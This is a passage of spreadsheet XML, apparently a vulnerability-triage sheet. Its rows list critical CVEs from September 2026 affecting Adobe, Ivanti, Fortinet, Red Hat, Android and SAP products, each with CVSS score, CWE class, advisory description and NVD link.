      <c r="M6" s="5" t="inlineStr"/>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P6" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q6" s="5" t="inlineStr"/>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="S6" s="5" t="inlineStr">
        <is>
          <t>A memory safety vulnerability exists in the Extended Passport Protocol (EPP) processing library. Under specific conditions, an unauthenticated attacker could exploit a crafted network request containing a malformed EPP header, potentially resulting in undefined behavior and abnormal program termination. Successful exploitation may have a high impact on the confidentiality, integrity, and availability of the application.</t>
        </is>
      </c>
      <c r="T6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44756</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82004</t>
        </is>
      </c>
      <c r="D7" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F7" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G7" s="5" t="inlineStr"/>
      <c r="H7" s="5" t="n">
        <v>0.014</v>
      </c>
      <c r="I7" s="5" t="inlineStr"/>
      <c r="J7" s="5" t="inlineStr"/>
      <c r="K7" s="5" t="inlineStr">
        <is>
          <t>adobe:campaign</t>
        </is>
      </c>
      <c r="L7" s="5" t="inlineStr"/>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q7" s="5" t="inlineStr"/>
      <c r="R7" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S7" s="5" t="inlineStr">
        <is>
          <t>Adobe Campaign Classic (ACC) is affected by an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability that could result in arbitrary code execution in the context of the current user. An attacker could exploit this vulnerability to execute arbitrary code. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="T7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82004</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12645</t>
        </is>
      </c>
      <c r="D8" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F8" s="5" t="inlineStr">
        <is>
          <t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t>
        </is>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I8" s="5" t="inlineStr"/>
      <c r="J8" s="5" t="inlineStr"/>
      <c r="K8" s="5" t="inlineStr"/>
      <c r="L8" s="5" t="inlineStr"/>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P8" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q8" s="5" t="inlineStr"/>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S8" s="5" t="inlineStr">
        <is>
          <t>A Missing Authorization vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="T8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12645</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12646</t>
        </is>
      </c>
      <c r="D9" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F9" s="5" t="inlineStr">
        <is>
          <t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t>
        </is>
      </c>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I9" s="5" t="inlineStr"/>
      <c r="J9" s="5" t="inlineStr"/>
      <c r="K9" s="5" t="inlineStr"/>
      <c r="L9" s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P9" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q9" s="5" t="inlineStr"/>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S9" s="5" t="inlineStr">
        <is>
          <t>A Missing Authorization vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="T9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12646</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12647</t>
        </is>
      </c>
      <c r="D10" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr"/>
      <c r="K10" s="5" t="inlineStr"/>
      <c r="L10" s="5" t="inlineStr"/>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P10" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q10" s="5" t="inlineStr"/>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S10" s="5" t="inlineStr">
        <is>
          <t>A Missing Authorization vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="T10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12647</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12650</t>
        </is>
      </c>
      <c r="D11" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="n">
        <v>0.015</v>
      </c>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr"/>
      <c r="K11" s="5" t="inlineStr"/>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q11" s="5" t="inlineStr"/>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S11" s="5" t="inlineStr">
        <is>
          <t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="T11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12650</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19232</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr"/>
      <c r="K12" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L12" s="5" t="inlineStr"/>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P12" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q12" s="5" t="inlineStr"/>
      <c r="R12" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S12" s="5" t="inlineStr">
        <is>
          <t>Adobe Experience Manager is affected by an Incorrect Authorization vulnerability that could result in arbitrary code execution in the context of the current user, potentially gaining elevated access or control over the victim's account or session. A low-privileged attacker could exploit this vulnerability to gain elevated access or control over the victim's account or session. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="T12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19232</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-26084</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>psirt@fortinet.com</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K13" s="5" t="inlineStr"/>
      <c r="L13" s="5" t="inlineStr"/>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q13" s="5" t="inlineStr"/>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S13" s="5" t="inlineStr">
        <is>
          <t>A improper access control vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.5, FortiSandbox 4.4.0 through 4.4.8, FortiSandbox Cloud 5.0.4 through 5.0.5, FortiSandbox PaaS 5.0.4 through 5.0.5 may allow attacker to access sensitive information via crafted HTTP requests.</t>
        </is>
      </c>
      <c r="T13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-26084</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48273</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="n">
        <v>0.019</v>
      </c>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr"/>
      <c r="K14" s="5" t="inlineStr">
        <is>
          <t>adobe:coldfusion</t>
        </is>
      </c>
      <c r="L14" s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q14" s="5" t="inlineStr"/>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="S14" s="5" t="inlineStr">
        <is>
          <t>ColdFusion is affected by an Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection') vulnerability that could result in arbitrary code execution in the context of the current user. A low-privileged attacker could exploit this vulnerability to execute arbitrary code. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="T14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48273</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78234</t>
        </is>
      </c>
      <c r="D15" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E15" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F15" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G15" s="5" t="inlineStr"/>
      <c r="H15" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I15" s="5" t="inlineStr"/>
      <c r="J15" s="5" t="inlineStr"/>
      <c r="K15" s="5" t="inlineStr"/>
      <c r="L15" s="5" t="inlineStr"/>
      <c r="M15" s="5" t="inlineStr"/>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q15" s="5" t="inlineStr"/>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="S15" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in hawtio-operator. The operator reads the OpenShift Service CA private signing key from the openshift-service-ca namespace and uses it to mint client certificates with a Subject Common Name (CN) supplied by the author of a namespaced Hawtio custom resource. Because the operator ships a ClusterRole that aggregates Hawtio CR permissions into the edit and admin roles, any user with edit access in any namespace can obtain a Service-CA-signed certificate with an arbitrary subject. This certificate can be used to impersonate any in-cluster service identity to peers that trust the Service CA for client authentication, including Jolokia agents and other Service-CA-trusting components.</t>
        </is>
      </c>
      <c r="T15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78234</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86464</t>
        </is>
      </c>
      <c r="D16" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>emo@eclipse.org</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr">
        <is>
          <t>kubernetes, docker, postgresql, keycloak</t>
        </is>
      </c>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q16" s="5" t="inlineStr"/>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>CWE-1188, CWE-1392, CWE-200, CWE-306, CWE-798</t>
        </is>
      </c>
      <c r="S16" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86464</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12744</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="n">
        <v>0.022</v>
      </c>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr"/>
      <c r="K17" s="5" t="inlineStr"/>
      <c r="L17" s="5" t="inlineStr"/>
      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q17" s="5" t="inlineStr"/>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S17" s="5" t="inlineStr">
        <is>
          <t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote unauthenticated attacker to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="T17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12744</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12745</t>
        </is>
      </c>
      <c r="D18" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="n">
        <v>0.021</v>
      </c>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr"/>
      <c r="K18" s="5" t="inlineStr"/>
      <c r="L18" s="5" t="inlineStr"/>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q18" s="5" t="inlineStr"/>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S18" s="5" t="inlineStr">
        <is>
          <t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote unauthenticated attacker to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="T18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12745</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28606</t>
        </is>
      </c>
      <c r="D19" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F19" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr"/>
      <c r="K19" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L19" s="5" t="inlineStr"/>
      <c r="M19" s="5" t="inlineStr"/>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q19" s="5" t="inlineStr"/>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S19" s="5" t="inlineStr">
        <is>
          <t>In handleBondStateChanged of AdapterService.java, there is a possible way to skip pairing due to a logic error in the code. This could lead to remote escalation of privilege without user consent with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28606</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49921</t>
        </is>
      </c>
      <c r="D20" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F20" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr"/>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr"/>
      <c r="M20" s="5" t="inlineStr"/>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q20" s="5" t="inlineStr"/>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S20" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible memory safety issue due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49921</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58240</t>
        </is>
      </c>
      <c r="D21" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E21" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F21" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K21" s="5" t="inlineStr"/>
      <c r="L21" s="5" t="inlineStr"/>
      <c r="M21" s="5" t="inlineStr"/>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q21" s="5" t="inlineStr"/>
      <c r="R21" s="5" t="inlineStr">
        <is>
          <t>CWE-308</t>
        </is>
      </c>
      <c r="S21" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58240</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58822</t>
        </is>
      </c>
      <c r="D22" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E22" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F22" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr"/>
      <c r="K22" s="5" t="inlineStr"/>
      <c r="L22" s="5" t="inlineStr"/>
      <c r="M22" s="5" t="inlineStr"/>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q22" s="5" t="inlineStr"/>
      <c r="R22" s="5" t="inlineStr">
        <is>
          <t>CWE-704</t>
        </is>
      </c>
      <c r="S22" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of ftsmooth.c, there is a possible memory safety issue due to improper casting. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
